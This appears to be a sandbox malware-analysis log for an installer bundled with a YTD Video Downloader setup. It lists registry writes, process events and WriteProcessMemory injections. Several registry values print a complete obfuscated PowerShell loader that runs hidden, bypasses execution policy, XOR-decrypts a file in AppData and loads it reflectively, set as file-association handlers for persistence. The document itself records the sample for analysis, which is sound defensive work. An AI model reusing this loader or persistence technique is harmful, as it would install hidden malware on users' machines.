Set value (str) \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\zpinfxlegqavb\shell\open\command\ = "PowErshelL -WIndOwStyLE hidDen -EP BypAss -cOmMAND \"$ae101636e6141d9f3ea1c56b4ad19='XjA9VkFeT2xzQ15ORlU3Xk9CJnNAU0JqRUB2eCtiXk9VYHlAeDY8JF5TR2FAQHN5akleUnxuUF5veldfQGBrZ2xAdEthZF5TKyZpXk5POW5eUlNKU15vXn5FXlBzdHlAVW9oZ14wMU1QQHUhUHteTlc8QkB1MFBvQGB8cDdAVHtxbF5SMTxfQHg4ZDReUDBNXkBSWDNaXlFlWkxAYGpTV0B3PlhaXlI9Q3heT21saF5vWD5OQFJXbTw=';$a49d63ef0c64d6896c7325c0e3b6b=[sYStEM.Io.FilE]::reaDALlByTES('C:\\Users\\Admin\\AppData\\Roaming\\mICRoSoFT\\RmDloHBSkgfJqnhI\\VzsJqGlBmaubx.ihjtUTNvzCR');FOr($aeb9eaa86f544fbc9f97163012971=0;$aeb9eaa86f544fbc9f97163012971 -Lt $a49d63ef0c64d6896c7325c0e3b6b.COuNT;){fOR($a803f0f737341687c8250cd617801=0;$a803f0f737341687c8250cd617801 -lT $ae101636e6141d9f3ea1c56b4ad19.lEngth;$a803f0f737341687c8250cd617801++){$a49d63ef0c64d6896c7325c0e3b6b[$aeb9eaa86f544fbc9f97163012971]=$a49d63ef0c64d6896c7325c0e3b6b[$aeb9eaa86f544fbc9f97163012971] -bxOr $ae101636e6141d9f3ea1c56b4ad19[$a803f0f737341687c8250cd617801];$aeb9eaa86f544fbc9f97163012971++;IF($aeb9eaa86f544fbc9f97163012971 -Ge $a49d63ef0c64d6896c7325c0e3b6b.cOuNt){$a803f0f737341687c8250cd617801=$ae101636e6141d9f3ea1c56b4ad19.LENGTh}}};[SYsTEm.ReFLecTIoN.AsSeMbLy]::LOad($a49d63ef0c64d6896c7325c0e3b6b);[mArS.deiMos]::inteRaCt()\"" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\.gsxsejlcvhqgpinn\ = "zpinfxlegqavb" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\.hucwkefhzoegqypibuv\ = "qlbwvenckwghjycymhz" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\xizvrpyqdelnjbqwye\shell C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\gayhiusqkilpcm\shell C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\ndhqnowpzdefglqlbh\shell\open\command\ = "PowErshelL -WIndOwStyLE hidDen -EP BypAss -cOmMAND \"$ae101636e6141d9f3ea1c56b4ad19='XjA9VkFeT2xzQ15ORlU3Xk9CJnNAU0JqRUB2eCtiXk9VYHlAeDY8JF5TR2FAQHN5akleUnxuUF5veldfQGBrZ2xAdEthZF5TKyZpXk5POW5eUlNKU15vXn5FXlBzdHlAVW9oZ14wMU1QQHUhUHteTlc8QkB1MFBvQGB8cDdAVHtxbF5SMTxfQHg4ZDReUDBNXkBSWDNaXlFlWkxAYGpTV0B3PlhaXlI9Q3heT21saF5vWD5OQFJXbTw=';$a49d63ef0c64d6896c7325c0e3b6b=[sYStEM.Io.FilE]::reaDALlByTES('C:\\Users\\Admin\\AppData\\Roaming\\mICRoSoFT\\IbPYVgHOnWLRyaw\\ZoGftgDjeOPKqnJb.JSrEXsqNjgTxiDOBGp');FOr($aeb9eaa86f544fbc9f97163012971=0;$aeb9eaa86f544fbc9f97163012971 -Lt $a49d63ef0c64d6896c7325c0e3b6b.COuNT;){fOR($a803f0f737341687c8250cd617801=0;$a803f0f737341687c8250cd617801 -lT $ae101636e6141d9f3ea1c56b4ad19.lEngth;$a803f0f737341687c8250cd617801++){$a49d63ef0c64d6896c7325c0e3b6b[$aeb9eaa86f544fbc9f97163012971]=$a49d63ef0c64d6896c7325c0e3b6b[$aeb9eaa86f544fbc9f97163012971] -bxOr $ae101636e6141d9f3ea1c56b4ad19[$a803f0f737341687c8250cd617801];$aeb9eaa86f544fbc9f97163012971++;IF($aeb9eaa86f544fbc9f97163012971 -Ge $a49d63ef0c64d6896c7325c0e3b6b.cOuNt){$a803f0f737341687c8250cd617801=$ae101636e6141d9f3ea1c56b4ad19.LENGTh}}};[SYsTEm.ReFLecTIoN.AsSeMbLy]::LOad($a49d63ef0c64d6896c7325c0e3b6b);[mArS.deiMos]::inteRaCt()\"" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\.ojotbsynykdq\ = "xizvrpyqdelnjbqwye" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\ndhqnowpzdefglqlbh C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\qlbwvenckwghjycymhz\shell\open\command\ = "PowErshelL -WIndOwStyLE hidDen -EP BypAss -cOmMAND \"$ae101636e6141d9f3ea1c56b4ad19='XjA9VkFeT2xzQ15ORlU3Xk9CJnNAU0JqRUB2eCtiXk9VYHlAeDY8JF5TR2FAQHN5akleUnxuUF5veldfQGBrZ2xAdEthZF5TKyZpXk5POW5eUlNKU15vXn5FXlBzdHlAVW9oZ14wMU1QQHUhUHteTlc8QkB1MFBvQGB8cDdAVHtxbF5SMTxfQHg4ZDReUDBNXkBSWDNaXlFlWkxAYGpTV0B3PlhaXlI9Q3heT21saF5vWD5OQFJXbTw=';$a49d63ef0c64d6896c7325c0e3b6b=[sYStEM.Io.FilE]::reaDALlByTES('C:\\Users\\Admin\\AppData\\Roaming\\mICRoSoFT\\hbidaOgyoAsjDp\\ISphYfgoRAMcDzEq.dejnAfJxTmhBqi');FOr($aeb9eaa86f544fbc9f97163012971=0;$aeb9eaa86f544fbc9f97163012971 -Lt $a49d63ef0c64d6896c7325c0e3b6b.COuNT;){fOR($a803f0f737341687c8250cd617801=0;$a803f0f737341687c8250cd617801 -lT $ae101636e6141d9f3ea1c56b4ad19.lEngth;$a803f0f737341687c8250cd617801++){$a49d63ef0c64d6896c7325c0e3b6b[$aeb9eaa86f544fbc9f97163012971]=$a49d63ef0c64d6896c7325c0e3b6b[$aeb9eaa86f544fbc9f97163012971] -bxOr $ae101636e6141d9f3ea1c56b4ad19[$a803f0f737341687c8250cd617801];$aeb9eaa86f544fbc9f97163012971++;IF($aeb9eaa86f544fbc9f97163012971 -Ge $a49d63ef0c64d6896c7325c0e3b6b.cOuNt){$a803f0f737341687c8250cd617801=$ae101636e6141d9f3ea1c56b4ad19.LENGTh}}};[SYsTEm.ReFLecTIoN.AsSeMbLy]::LOad($a49d63ef0c64d6896c7325c0e3b6b);[mArS.deiMos]::inteRaCt()\"" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\xizvrpyqdelnjbqwye\shell\open\command\ = "PowErshelL -WIndOwStyLE hidDen -EP BypAss -cOmMAND \"$ae101636e6141d9f3ea1c56b4ad19='XjA9VkFeT2xzQ15ORlU3Xk9CJnNAU0JqRUB2eCtiXk9VYHlAeDY8JF5TR2FAQHN5akleUnxuUF5veldfQGBrZ2xAdEthZF5TKyZpXk5POW5eUlNKU15vXn5FXlBzdHlAVW9oZ14wMU1QQHUhUHteTlc8QkB1MFBvQGB8cDdAVHtxbF5SMTxfQHg4ZDReUDBNXkBSWDNaXlFlWkxAYGpTV0B3PlhaXlI9Q3heT21saF5vWD5OQFJXbTw=';$a49d63ef0c64d6896c7325c0e3b6b=[sYStEM.Io.FilE]::reaDALlByTES('C:\\Users\\Admin\\AppData\\Roaming\\mICRoSoFT\\roKdFIYfCAcWaumehQ\\MIWXbpJrdQylveUVRA.fbsLlnEQdMyHrowq');FOr($aeb9eaa86f544fbc9f97163012971=0;$aeb9eaa86f544fbc9f97163012971 -Lt $a49d63ef0c64d6896c7325c0e3b6b.COuNT;){fOR($a803f0f737341687c8250cd617801=0;$a803f0f737341687c8250cd617801 -lT $ae101636e6141d9f3ea1c56b4ad19.lEngth;$a803f0f737341687c8250cd617801++){$a49d63ef0c64d6896c7325c0e3b6b[$aeb9eaa86f544fbc9f97163012971]=$a49d63ef0c64d6896c7325c0e3b6b[$aeb9eaa86f544fbc9f97163012971] -bxOr $ae101636e6141d9f3ea1c56b4ad19[$a803f0f737341687c8250cd617801];$aeb9eaa86f544fbc9f97163012971++;IF($aeb9eaa86f544fbc9f97163012971 -Ge $a49d63ef0c64d6896c7325c0e3b6b.cOuNt){$a803f0f737341687c8250cd617801=$ae101636e6141d9f3ea1c56b4ad19.LENGTh}}};[SYsTEm.ReFLecTIoN.AsSeMbLy]::LOad($a49d63ef0c64d6896c7325c0e3b6b);[mArS.deiMos]::inteRaCt()\"" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\txlgibmptcbgefnzkow\shell C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\txlgibmptcbgefnzkow\shell\open\command\ = "PowErshelL -WIndOwStyLE hidDen -EP BypAss -cOmMAND \"$ae101636e6141d9f3ea1c56b4ad19='XjA9VkFeT2xzQ15ORlU3Xk9CJnNAU0JqRUB2eCtiXk9VYHlAeDY8JF5TR2FAQHN5akleUnxuUF5veldfQGBrZ2xAdEthZF5TKyZpXk5POW5eUlNKU15vXn5FXlBzdHlAVW9oZ14wMU1QQHUhUHteTlc8QkB1MFBvQGB8cDdAVHtxbF5SMTxfQHg4ZDReUDBNXkBSWDNaXlFlWkxAYGpTV0B3PlhaXlI9Q3heT21saF5vWD5OQFJXbTw=';$a49d63ef0c64d6896c7325c0e3b6b=[sYStEM.Io.FilE]::reaDALlByTES('C:\\Users\\Admin\\AppData\\Roaming\\mICRoSoFT\\PkVdmbAwgriyB\\HVaJBrEtDYZ.jvhroPDqNBXQHsk');FOr($aeb9eaa86f544fbc9f97163012971=0;$aeb9eaa86f544fbc9f97163012971 -Lt $a49d63ef0c64d6896c7325c0e3b6b.COuNT;){fOR($a803f0f737341687c8250cd617801=0;$a803f0f737341687c8250cd617801 -lT $ae101636e6141d9f3ea1c56b4ad19.lEngth;$a803f0f737341687c8250cd617801++){$a49d63ef0c64d6896c7325c0e3b6b[$aeb9eaa86f544fbc9f97163012971]=$a49d63ef0c64d6896c7325c0e3b6b[$aeb9eaa86f544fbc9f97163012971] -bxOr $ae101636e6141d9f3ea1c56b4ad19[$a803f0f737341687c8250cd617801];$aeb9eaa86f544fbc9f97163012971++;IF($aeb9eaa86f544fbc9f97163012971 -Ge $a49d63ef0c64d6896c7325c0e3b6b.cOuNt){$a803f0f737341687c8250cd617801=$ae101636e6141d9f3ea1c56b4ad19.LENGTh}}};[SYsTEm.ReFLecTIoN.AsSeMbLy]::LOad($a49d63ef0c64d6896c7325c0e3b6b);[mArS.deiMos]::inteRaCt()\"" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\xizvrpyqdelnjbqwye\shell\open\command C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\ndhqnowpzdefglqlbh\shell\open\command C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\xizvrpyqdelnjbqwye\shell\open C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\.fugcczgqfkn\ = "ndhqnowpzdefglqlbh" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\ndhqnowpzdefglqlbh\shell C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\gayhiusqkilpcm\shell\open\command C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\.hucwkefhzoegqypibuv C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\txlgibmptcbgefnzkow C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\.njekblnzhwlihimv C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\qlbwvenckwghjycymhz\shell\open C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\zpinfxlegqavb\shell\open\command C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\zpinfxlegqavb\shell C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\.xrizrwhtdslwpo C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\txlgibmptcbgefnzkow\shell\open\command C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\qlbwvenckwghjycymhz\shell\open\command C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\gayhiusqkilpcm\shell\open C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\.xrizrwhtdslwpo\ = "gayhiusqkilpcm" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\zpinfxlegqavb C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\xizvrpyqdelnjbqwye C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\.gsxsejlcvhqgpinn C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\gayhiusqkilpcm C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\.fugcczgqfkn C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1028 wrote to memory of 1576 N/A C:\Users\Admin\AppData\Local\Temp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.exe C:\Users\Admin\AppData\Local\Temp\is-JUJ61.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp
PID 1028 wrote to memory of 1576 N/A C:\Users\Admin\AppData\Local\Temp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.exe C:\Users\Admin\AppData\Local\Temp\is-JUJ61.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp
PID 1028 wrote to memory of 1576 N/A C:\Users\Admin\AppData\Local\Temp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.exe C:\Users\Admin\AppData\Local\Temp\is-JUJ61.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp
PID 1576 wrote to memory of 4584 N/A C:\Users\Admin\AppData\Local\Temp\is-JUJ61.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe
PID 1576 wrote to memory of 4584 N/A C:\Users\Admin\AppData\Local\Temp\is-JUJ61.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe
PID 1576 wrote to memory of 4584 N/A C:\Users\Admin\AppData\Local\Temp\is-JUJ61.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe
PID 1576 wrote to memory of 2912 N/A C:\Users\Admin\AppData\Local\Temp\is-JUJ61.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1576 wrote to memory of 2912 N/A C:\Users\Admin\AppData\Local\Temp\is-JUJ61.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1576 wrote to memory of 2912 N/A C:\Users\Admin\AppData\Local\Temp\is-JUJ61.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1576 wrote to memory of 3992 N/A C:\Users\Admin\AppData\Local\Temp\is-JUJ61.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1576 wrote to memory of 3992 N/A C:\Users\Admin\AppData\Local\Temp\is-JUJ61.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1576 wrote to memory of 3992 N/A C:\Users\Admin\AppData\Local\Temp\is-JUJ61.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1576 wrote to memory of 1520 N/A C:\Users\Admin\AppData\Local\Temp\is-JUJ61.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1576 wrote to memory of 1520 N/A C:\Users\Admin\AppData\Local\Temp\is-JUJ61.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1576 wrote to memory of 1520 N/A C:\Users\Admin\AppData\Local\Temp\is-JUJ61.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1576 wrote to memory of 3680 N/A C:\Users\Admin\AppData\Local\Temp\is-JUJ61.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1576 wrote to memory of 3680 N/A C:\Users\Admin\AppData\Local\Temp\is-JUJ61.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
